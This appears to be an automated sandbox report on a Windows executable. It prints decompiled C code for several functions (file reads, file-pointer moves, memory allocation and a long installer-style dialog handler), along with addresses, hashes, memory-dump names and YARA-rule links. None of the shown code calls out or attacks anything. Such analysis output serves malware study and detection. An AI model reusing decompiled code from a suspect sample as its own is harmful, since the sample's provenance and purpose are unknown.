                                                                                                                          • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                                          • Instruction Fuzzy Hash: 72C04CB1808501BBD6015B24DF0D81F7B66EB51321B508F35F56DE00F1C7355CA6DA1A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 0040304E, Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E0040304E(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409014, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}





                                                                                                                          0x00403052
                                                                                                                          0x00403065
                                                                                                                          0x0040306d
                                                                                                                          0x00000000
                                                                                                                          0x00403074
                                                                                                                          0x00000000
                                                                                                                          0x00403076

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402EA7,000000FF,00000004,00000000,00000000,00000000), ref: 00403065
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2738559852-0
                                                                                                                          • Opcode ID: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                          • Instruction ID: cf04fcf122da41e7499d2f74f705547a68887b1f6d4f421339b8fb166199a16f
                                                                                                                          • Opcode Fuzzy Hash: 728267699a9b44ddad9e6e694247195ab13049bac6004c2e56fc09e99b3f0f19
                                                                                                                          • Instruction Fuzzy Hash: 2AE08C32901118BBCF205E619C00EAB3B5CEB053A2F00C032FA14E52A0D630EA11DBAA
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00403080, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00403080(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409014, _a4, 0, 0); // executed
				return _t2;
			}




                                                                                                                          0x0040308e
                                                                                                                          0x00403094

                                                                                                                          APIs
                                                                                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DE9,00007DE4), ref: 0040308E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.335736473.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.335724114.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335749978.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335758150.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335774251.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335781240.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.335787934.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: FilePointer
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 973152223-0
                                                                                                                          • Opcode ID: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                          • Instruction ID: eafd0aff1283cdec3023edec91852d87283cefa69c9b21bce59c6677f93a42a7
                                                                                                                          • Opcode Fuzzy Hash: 2028dafccfaa88a297be93e7ba1f52e009ec02dcd94d5fd44c1761bf2bffe23e
                                                                                                                          • Instruction Fuzzy Hash: 14B01271644200BFDB214F00DF06F057B21A790701F108030B344380F082712420EB1E
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001000, Relevance: 1.3, APIs: 1, Instructions: 16memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 27%
                                                                                                                          			E10001000(intOrPtr _a8, intOrPtr _a16) {
				long _t5;
				void* _t6;

				 *0x10004058 = _a8;
				 *0x1000405c = _a16;
				_t5 = E100017FE();
				if(_t5 != 0) {
					_t6 = GlobalAlloc(0x40, _t5); // executed
					_push(_t6);
				} else {
					_push(_t5);
				}
				return E10001825();
			}





                                                                                                                          0x10001004
                                                                                                                          0x1000100d
                                                                                                                          0x10001012
                                                                                                                          0x10001019
                                                                                                                          0x10001021
                                                                                                                          0x10001027
                                                                                                                          0x1000101b
                                                                                                                          0x1000101b
                                                                                                                          0x1000101b
                                                                                                                          0x1000102e

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,00000000), ref: 10001021
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
                                                                                                                          • Opcode ID: 023b6dbb777d1917f2a02935aae2fac2c5a2dc8c30c8e10d6e6ce090962d3b5b
                                                                                                                          • Instruction ID: 099bf70f298303271a826424d9ac3f9410695f2538c5729eebddd676c7a58e86
                                                                                                                          • Opcode Fuzzy Hash: 023b6dbb777d1917f2a02935aae2fac2c5a2dc8c30c8e10d6e6ce090962d3b5b
                                                                                                                          • Instruction Fuzzy Hash: BDD05EF8604381ABF300DF60C885A4B37E8EB482C0F118819FA45D2118DA7498404F20
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 10001541, Relevance: 1.3, APIs: 1, Instructions: 4memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E10001541() {
				void* _t1;

				_t1 = GlobalAlloc(0x40,  *0x10004058); // executed
				return _t1;
			}




                                                                                                                          0x10001549
                                                                                                                          0x1000154f

                                                                                                                          APIs
                                                                                                                          • GlobalAlloc.KERNELBASE(00000040,10001577,?,?,10001804,?,10001017), ref: 10001549
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000002.00000002.337430862.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                          • Associated: 00000002.00000002.337412850.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337450406.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000002.00000002.337467323.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                          Similarity
                                                                                                                          • API ID: AllocGlobal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3761449716-0
                                                                                                                          • Opcode ID: 7b5eed81e2901482d8b61a1c6600ff8eb3952a21cb33a114867dcac47047f9af
                                                                                                                          • Instruction ID: 305db27d9feb3ad942446de8fc5e9d5ce911d10906235a569225c64140842302
                                                                                                                          • Opcode Fuzzy Hash: 7b5eed81e2901482d8b61a1c6600ff8eb3952a21cb33a114867dcac47047f9af
                                                                                                                          • Instruction Fuzzy Hash: 86A002B25415609BFE466BD08D9EF463F25F744781F128040E719650B8CA750064DF19
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Non-executed Functions

                                                                                                                          Function 004046CA, Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 478windowmemoryCOMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 98%
                                                                                                                          			E004046CA(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				intOrPtr _t183;
				int _t189;
				int _t196;
				intOrPtr _t198;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				intOrPtr _t231;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				signed int _t242;
				signed int _t245;
				signed int _t247;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				signed int* _t284;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				int _t294;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				intOrPtr _t309;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;
				void* _t328;
				void* _t331;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ea8; // 0x486a5c
				_t320 = SendMessageA;
				_v8 = _t182;
				_t183 =  *0x423e90; // 0x4868b0
				_t315 = 0;
				_v32 = _t280;
				_v20 = _t183 + 0x94;
				if(_a8 != 0x110) {
					L23:
					__eflags = _a8 - 0x405;
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					__eflags = _a8 - 0x4e;
					if(_a8 == 0x4e) {
						L28:
						__eflags = _a8 - 0x413;
						_v16 = _t289;
						if(_a8 == 0x413) {
							L30:
							__eflags =  *0x423e99 & 0x00000002;
							if(( *0x423e99 & 0x00000002) != 0) {
								L41:
								__eflags = _v16 - _t315;
								if(_v16 != _t315) {
									_t232 = _v16;
									__eflags =  *((intOrPtr*)(_t232 + 8)) - 0xfffffe6e;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									__eflags =  *((intOrPtr*)(_t233 + 8)) - 0xfffffe6a;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										__eflags =  *((intOrPtr*)(_t233 + 0xc)) - 2;
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											_t284 =  *(_t233 + 0x5c) * 0x418 + _t280 + 8;
											 *_t284 =  *_t284 & 0xffffffdf;
											__eflags =  *_t284;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							__eflags = _a8 - 0x413;
							if(_a8 == 0x413) {
								L33:
								__eflags = _a8 - 0x413;
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E0040464A(_v8, _a8 != 0x413);
								__eflags = _t240 - _t315;
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									__eflags = _t289 & 0x00000010;
									if((_t289 & 0x00000010) == 0) {
										__eflags = _t289 & 0x00000040;
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
											__eflags = _t298;
										} else {
											_t300 = _t289 ^ 0x00000080;
											__eflags = _t300;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t242 =  *0x423e98; // 0x80
										_t289 = 1;
										_a8 = 0x40f;
										_t245 =  !_t242 >> 0x00000008 & 1;
										__eflags = _t245;
										_a12 = 1;
										_a16 = _t245;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							__eflags =  *((intOrPtr*)(_t289 + 8)) - 0xfffffffe;
							if( *((intOrPtr*)(_t289 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						}
						__eflags =  *((intOrPtr*)(_t289 + 4)) - 0x408;
						if( *((intOrPtr*)(_t289 + 4)) != 0x408) {
							goto L48;
						}
						goto L30;
					} else {
						__eflags = _a8 - 0x413;
						if(_a8 != 0x413) {
							L48:
							__eflags = _a8 - 0x111;
							if(_a8 != 0x111) {
								L56:
								__eflags = _a8 - 0x200;
								if(_a8 == 0x200) {
									SendMessageA(_v8, 0x200, _t315, _t315);
								}
								__eflags = _a8 - 0x40b;
								if(_a8 == 0x40b) {
									_t220 =  *0x420454;
									__eflags = _t220 - _t315;
									if(_t220 != _t315) {
										ImageList_Destroy(_t220);
									}
									_t221 =  *0x42046c;
									__eflags = _t221 - _t315;
									if(_t221 != _t315) {
										GlobalFree(_t221);
									}
									 *0x420454 = _t315;
									 *0x42046c = _t315;
									 *0x423ee0 = _t315;
								}
								__eflags = _a8 - 0x40f;
								if(_a8 != 0x40f) {
									L86:
									__eflags = _a8 - 0x420;
									if(_a8 == 0x420) {
										__eflags =  *0x423e99 & 0x00000001;
										if(( *0x423e99 & 0x00000001) != 0) {
											__eflags = _a16 - 0x20;
											_t189 = (0 | _a16 == 0x00000020) << 3;
											__eflags = _t189;
											_t316 = _t189;
											ShowWindow(_v8, _t316);
											ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
										}
									}
									goto L89;
								} else {
									E004011EF(_t289, _t315, _t315);
									__eflags = _a12 - _t315;
									if(_a12 != _t315) {
										E0040140B(8);
									}
									__eflags = _a16 - _t315;
									if(_a16 == _t315) {
										L73:
										E004011EF(_t289, _t315, _t315);
										__eflags =  *0x423eac - _t315; // 0x1
										_v32 =  *0x42046c;
										_t196 =  *0x423ea8; // 0x486a5c
										_v60 = 0xf030;
										_v16 = _t315;
										if(__eflags <= 0) {
											L84:
											InvalidateRect(_v8, _t315, 1);
											_t198 =  *0x42365c; // 0x48b9e6
											__eflags =  *((intOrPtr*)(_t198 + 0x10)) - _t315;
											if( *((intOrPtr*)(_t198 + 0x10)) != _t315) {
												E00404568(0x3ff, 0xfffffffb, E0040461D(5));
											}
											goto L86;
										} else {
											_t142 = _t196 + 8; // 0x486a64
											_t281 = _t142;
											do {
												_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
												__eflags = _t202 - _t315;
												if(_t202 != _t315) {
													_t291 =  *_t281;
													_v68 = _t202;
													__eflags = _t291 & 0x00000001;
													_v72 = 8;
													if((_t291 & 0x00000001) != 0) {
														_t151 =  &(_t281[4]); // 0x486a74
														_v72 = 9;
														_v56 = _t151;
														_t154 =  &(_t281[0]);
														 *_t154 = _t281[0] & 0x000000fe;
														__eflags =  *_t154;
													}
													__eflags = _t291 & 0x00000040;
													if((_t291 & 0x00000040) == 0) {
														_t206 = (_t291 & 0x00000001) + 1;
														__eflags = _t291 & 0x00000010;
														if((_t291 & 0x00000010) != 0) {
															_t206 = _t206 + 3;
															__eflags = _t206;
														}
													} else {
														_t206 = 3;
													}
													_t294 = (_t291 >> 0x00000005 & 0x00000001) + 1;
													__eflags = _t294;
													_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
													SendMessageA(_v8, 0x1102, _t294, _v68);
													SendMessageA(_v8, 0x110d, _t315,  &_v72);
												}
												_v16 = _v16 + 1;
												_t281 =  &(_t281[0x106]);
												__eflags = _v16 -  *0x423eac; // 0x1
											} while (__eflags < 0);
											goto L84;
										}
									} else {
										_t282 = E004012E2( *0x42046c);
										E00401299(_t282);
										_t217 = 0;
										_t289 = 0;
										__eflags = _t282 - _t315;
										if(_t282 <= _t315) {
											L72:
											SendMessageA(_v12, 0x14e, _t289, _t315);
											_a16 = _t282;
											_a8 = 0x420;
											goto L73;
										} else {
											goto L69;
										}
										do {
											L69:
											_t309 = _v20;
											__eflags =  *((intOrPtr*)(_t309 + _t217 * 4)) - _t315;
											if( *((intOrPtr*)(_t309 + _t217 * 4)) != _t315) {
												_t289 = _t289 + 1;
												__eflags = _t289;
											}
											_t217 = _t217 + 1;
											__eflags = _t217 - _t282;
										} while (_t217 < _t282);
										goto L72;
									}
								}
							}
							__eflags = _a12 - 0x3f9;
							if(_a12 != 0x3f9) {
								goto L89;
							}
							__eflags = _a12 >> 0x10 - 1;
							if(_a12 >> 0x10 != 1) {
								goto L89;
							}
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							__eflags = _t227 - 0xffffffff;
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							__eflags = _t283 - 0xffffffff;
							if(_t283 == 0xffffffff) {
								L54:
								_t283 = 0x20;
								L55:
								E00401299(_t283);
								SendMessageA(_a4, 0x420, _t315, _t283);
								_a12 = 1;
								_a16 = _t315;
								_a8 = 0x40f;
								goto L56;
							}
							_t231 = _v20;
							__eflags =  *((intOrPtr*)(_t231 + _t283 * 4)) - _t315;
							if( *((intOrPtr*)(_t231 + _t283 * 4)) != _t315) {
								goto L55;
							}
							goto L54;
						}
						goto L28;
					}
				} else {
					 *0x423ee0 = _a4;
					_t247 =  *0x423eac; // 0x1
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42046c = GlobalAlloc(0x40, _t247 << 2);
					_t250 = LoadBitmapA( *0x423e80, 0x6e);
					 *0x420460 =  *0x420460 | 0xffffffff;
					_v24 = _t250;
					 *0x420468 = SetWindowLongA(_v8, 0xfffffffc, E00404CCB);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420454 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420454);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E004059FF(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403D8F(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403D8F(_a4);
					_t318 = 0;
					_t288 = 0;
					_t328 =  *0x423eac - _t318; // 0x1
					if(_t328 <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									__eflags = _t269 & 0x00000004;
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42046c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42046c + _t318 * 4) = _t274;
									_t288 =  *( *0x42046c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_t331 = _t318 -  *0x423eac; // 0x1
							_v24 = _t311;
						} while (_t331 < 0);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403DC4(_v8);
								_t280 = _v32;
								_t315 = 0;
								__eflags = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403DC4(_v12);
								L89:
								return E00403DF6(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}






































































                                                                                                                          0x004046e8
                                                                                                                          0x004046ee
                                                                                                                          0x004046f0
                                                                                                                          0x004046f6
                                                                                                                          0x004046fc
                                                                                                                          0x004046ff
                                                                                                                          0x00404709
                                                                                                                          0x00404712
                                                                                                                          0x00404715
                                                                                                                          0x00404718
                                                                                                                          0x00404940
                                                                                                                          0x00404940
                                                                                                                          0x00404947
                                                                                                                          0x0040495b
                                                                                                                          0x00404949
                                                                                                                          0x0040494b
                                                                                                                          0x0040494e
                                                                                                                          0x0040494f
                                                                                                                          0x00404956
                                                                                                                          0x00404956
                                                                                                                          0x0040495e
                                                                                                                          0x00404967
                                                                                                                          0x00404972
                                                                                                                          0x00404972
                                                                                                                          0x00404975
                                                                                                                          0x00404978
                                                                                                                          0x00404987
                                                                                                                          0x00404987
                                                                                                                          0x0040498e
                                                                                                                          0x00404a06
                                                                                                                          0x00404a06
                                                                                                                          0x00404a09
                                                                                                                          0x00404a0b
                                                                                                                          0x00404a0e
                                                                                                                          0x00404a15
                                                                                                                          0x00404a23
                                                                                                                          0x00404a23
                                                                                                                          0x00404a25
                                                                                                                          0x00404a28
                                                                                                                          0x00404a2f
                                                                                                                          0x00404a31
                                                                                                                          0x00404a35
                                                                                                                          0x00404a52
                                                                                                                          0x00404a56
                                                                                                                          0x00404a56
                                                                                                                          0x00404a37
                                                                                                                          0x00404a44
                                                                                                                          0x00404a44
                                                                                                                          0x00404a35
                                                                                                                          0x00404a2f
                                                                                                                          0x00000000
                                                                                                                          0x00404a09
                                                                                                                          0x00404990
                                                                                                                          0x00404993
                                                                                                                          0x0040499e
                                                                                                                          0x004049a0
                                                                                                                          0x004049a3
                                                                                                                          0x004049aa
                                                                                                                          0x004049af
                                                                                                                          0x004049b1
                                                                                                                          0x004049bb
                                                                                                                          0x004049bb
                                                                                                                          0x004049bf
                                                                                                                          0x004049c1
                                                                                                                          0x004049c4
                                                                                                                          0x004049c6
                                                                                                                          0x004049c9
                                                                                                                          0x004049df
                                                                                                                          0x004049df
                                                                                                                          0x004049cb
                                                                                                                          0x004049cb
                                                                                                                          0x004049d1
                                                                                                                          0x004049d3
                                                                                                                          0x004049da
                                                                                                                          0x004049d5
                                                                                                                          0x004049d5
                                                                                                                          0x004049d5
                                                                                                                          0x004049d3
                                                                                                                          0x004049e3
                                                                                                                          0x004049e5
                                                                                                                          0x004049ea
                                                                                                                          0x004049f3
                                                                                                                          0x004049f4
                                                                                                                          0x004049fe
                                                                                                                          0x004049fe
                                                                                                                          0x00404a00
                                                                                                                          0x00404a03
                                                                                                                          0x00404a03
                                                                                                                          0x004049c4
                                                                                                                          0x00000000
                                                                                                                          0x004049b1
                                                                                                                          0x00404995
                                                                                                                          0x00404998
                                                                                                                          0x0040499c
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040499c
                                                                                                                          0x0040497a
                                                                                                                          0x00404981
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404969
                                                                                                                          0x00404969
                                                                                                                          0x0040496c
                                                                                                                          0x00404a59
                                                                                                                          0x00404a59
                                                                                                                          0x00404a60
                                                                                                                          0x00404ad4
                                                                                                                          0x00404ad4
                                                                                                                          0x00404adb
                                                                                                                          0x00404ae7
                                                                                                                          0x00404ae7
                                                                                                                          0x00404ae9
                                                                                                                          0x00404af0
                                                                                                                          0x00404af2
                                                                                                                          0x00404af7
                                                                                                                          0x00404af9
                                                                                                                          0x00404afc
                                                                                                                          0x00404afc
                                                                                                                          0x00404b02
                                                                                                                          0x00404b07
                                                                                                                          0x00404b09
                                                                                                                          0x00404b0c
                                                                                                                          0x00404b0c
                                                                                                                          0x00404b12
                                                                                                                          0x00404b18
                                                                                                                          0x00404b1e
                                                                                                                          0x00404b1e
                                                                                                                          0x00404b24
                                                                                                                          0x00404b2b
                                                                                                                          0x00404c78
                                                                                                                          0x00404c78
                                                                                                                          0x00404c7f
                                                                                                                          0x00404c81
                                                                                                                          0x00404c88
                                                                                                                          0x00404c8c
                                                                                                                          0x00404c99
                                                                                                                          0x00404c99
                                                                                                                          0x00404c9c
                                                                                                                          0x00404ca2
                                                                                                                          0x00404cb4
                                                                                                                          0x00404cb4
                                                                                                                          0x00404c88
                                                                                                                          0x00000000
                                                                                                                          0x00404b31
                                                                                                                          0x00404b33
                                                                                                                          0x00404b38
                                                                                                                          0x00404b3b
                                                                                                                          0x00404b3f
                                                                                                                          0x00404b3f
                                                                                                                          0x00404b44
                                                                                                                          0x00404b47
                                                                                                                          0x00404b88
                                                                                                                          0x00404b8a
                                                                                                                          0x00404b94
                                                                                                                          0x00404b9a
                                                                                                                          0x00404b9d
                                                                                                                          0x00404ba2
                                                                                                                          0x00404ba9
                                                                                                                          0x00404bac
                                                                                                                          0x00404c4e
                                                                                                                          0x00404c54
                                                                                                                          0x00404c5a
                                                                                                                          0x00404c5f
                                                                                                                          0x00404c62
                                                                                                                          0x00404c73
                                                                                                                          0x00404c73
                                                                                                                          0x00000000
                                                                                                                          0x00404bb2
                                                                                                                          0x00404bb2
                                                                                                                          0x00404bb2
                                                                                                                          0x00404bb5
                                                                                                                          0x00404bbb
                                                                                                                          0x00404bbe
                                                                                                                          0x00404bc0
                                                                                                                          0x00404bc2
                                                                                                                          0x00404bc4
                                                                                                                          0x00404bc7
                                                                                                                          0x00404bca
                                                                                                                          0x00404bd1
                                                                                                                          0x00404bd3
                                                                                                                          0x00404bd6
                                                                                                                          0x00404bdd
                                                                                                                          0x00404be0
                                                                                                                          0x00404be0
                                                                                                                          0x00404be0
                                                                                                                          0x00404be0
                                                                                                                          0x00404be4
                                                                                                                          0x00404be7
                                                                                                                          0x00404bf3
                                                                                                                          0x00404bf4
                                                                                                                          0x00404bf7
                                                                                                                          0x00404bf9
                                                                                                                          0x00404bf9
                                                                                                                          0x00404bf9
                                                                                                                          0x00404be9
                                                                                                                          0x00404beb
                                                                                                                          0x00404beb
                                                                                                                          0x00404c18
                                                                                                                          0x00404c18
                                                                                                                          0x00404c19
                                                                                                                          0x00404c25
                                                                                                                          0x00404c34
                                                                                                                          0x00404c34
                                                                                                                          0x00404c36
                                                                                                                          0x00404c39
                                                                                                                          0x00404c42
                                                                                                                          0x00404c42
                                                                                                                          0x00000000
                                                                                                                          0x00404bb5
                                                                                                                          0x00404b49
                                                                                                                          0x00404b54
                                                                                                                          0x00404b57
                                                                                                                          0x00404b5c
                                                                                                                          0x00404b5e
                                                                                                                          0x00404b60
                                                                                                                          0x00404b62
                                                                                                                          0x00404b72
                                                                                                                          0x00404b7c
                                                                                                                          0x00404b7e
                                                                                                                          0x00404b81
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404b64
                                                                                                                          0x00404b64
                                                                                                                          0x00404b64
                                                                                                                          0x00404b67
                                                                                                                          0x00404b6a
                                                                                                                          0x00404b6c
                                                                                                                          0x00404b6c
                                                                                                                          0x00404b6c
                                                                                                                          0x00404b6d
                                                                                                                          0x00404b6e
                                                                                                                          0x00404b6e
                                                                                                                          0x00000000
                                                                                                                          0x00404b64
                                                                                                                          0x00404b47
                                                                                                                          0x00404b2b
                                                                                                                          0x00404a62
                                                                                                                          0x00404a68
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404a74
                                                                                                                          0x00404a78
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404a88
                                                                                                                          0x00404a8a
                                                                                                                          0x00404a8d
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404a9f
                                                                                                                          0x00404aa1
                                                                                                                          0x00404aa4
                                                                                                                          0x00404aae
                                                                                                                          0x00404ab0
                                                                                                                          0x00404ab1
                                                                                                                          0x00404ab2
                                                                                                                          0x00404ac1
                                                                                                                          0x00404ac3
                                                                                                                          0x00404aca
                                                                                                                          0x00404acd
                                                                                                                          0x00000000
                                                                                                                          0x00404acd
                                                                                                                          0x00404aa6
                                                                                                                          0x00404aa9
                                                                                                                          0x00404aac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00404aac
                                                                                                                          0x00000000
                                                                                                                          0x0040496c
                                                                                                                          0x0040471e
                                                                                                                          0x00404723
                                                                                                                          0x00404728
                                                                                                                          0x0040472d
                                                                                                                          0x0040472e
                                                                                                                          0x00404737
                                                                                                                          0x00404742
                                                                                                                          0x0040474d
                                                                                                                          0x00404753
                                                                                                                          0x00404761
                                                                                                                          0x00404776
                                                                                                                          0x0040477b
                                                                                                                          0x00404786
                                                                                                                          0x0040478f
